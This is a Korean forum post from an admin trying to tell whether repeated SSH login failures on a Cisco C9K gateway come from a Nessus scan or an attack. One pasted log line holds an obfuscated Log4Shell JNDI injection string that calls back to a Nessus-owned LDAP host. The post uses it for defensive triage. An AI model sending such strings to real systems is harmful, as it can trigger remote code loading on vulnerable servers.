Jump to content

lupineye

MASTER
  • Posts

    1
  • Joined

  • Last visited

About lupineye

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

lupineye's Achievements

Newbie

Newbie (1/14)

  • One Year In
  • Dedicated
  • One Month Later
  • Conversation Starter Rare
  • Week One Done

Recent Badges

0

Reputation

  1. C9K IOS-XE gateway에 지속적으로 이런 log가 뜨는데, 이게 Nessus application에서 스위치로 SSH vulnerability 테스트를 하는 건지, Attack인지 잘 모르겠네요. NOC에서는 정보가 없고 아무것도 모르고 QID-375964 VIT3546584 Oracle Java SE Critical Patch Update - October 2021 (CPUOCT2021) 위와 같은 message만 자동으로 날려주거든요. source ip는 특정 몇개의 ip로 바뀌면서 날라오네요. 아주 랜덤하게 바뀌면서 날라 오지는 않아 보임니다. ================================================================================================ 651640: Apr 12 08:10:37.945 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:37 UTC Tue Apr 12 2022 651641: Apr 12 08:10:40.096 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:40 UTC Tue Apr 12 2022 651642: Apr 12 08:10:43.412 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:43 UTC Tue Apr 12 2022 651643: Apr 12 08:10:46.849 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:46 UTC Tue Apr 12 2022 651644: Apr 12 08:10:52.318 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:52 UTC Tue Apr 12 2022 651645: Apr 12 08:10:55.647 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:10:55 UTC Tue Apr 12 2022 651646: Apr 12 08:11:04.941 UTC: %SSH-3-NO_MATCH: No matching cipher found: client ${jndi:ldap://log4shell-ssh-awXxH9QLamxmzdZVHtGQ${lower:ten}.w.nessus.org/nessus} server aes128-ctr,aes192-ctr,aes256-ctr 651647: Apr 12 08:11:42.645 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:42 UTC Tue Apr 12 2022 651648: Apr 12 08:11:45.582 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:45 UTC Tue Apr 12 2022 651649: Apr 12 08:11:48.088 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:48 UTC Tue Apr 12 2022 651650: Apr 12 08:11:50.289 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:50 UTC Tue Apr 12 2022 651651: Apr 12 08:11:53.681 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.108.37.14] [localport: 22] [Reason: Login Authentication Failed] at 08:11:53 UTC Tue Apr 12 2022 =============================================================================================================== >>>>>> 보통 credential을 잘못 쓰면 아래와 같이 log가 됨. 653123: Apr 13 16:42:54.754 UTC: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: Invalid-Credentials] [Source: 10.120.1.2] [localport: 22] [Reason: Login Authentication Failed] at 16:42:54 UTC Wed Apr 13 2022 653124: Apr 13 16:42:54.979 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: f-nmsauto] [Source: 10.120.1.2] [localport: 22] at 16:42:54 UTC Wed Apr 13 2022
×
×
  • Create New...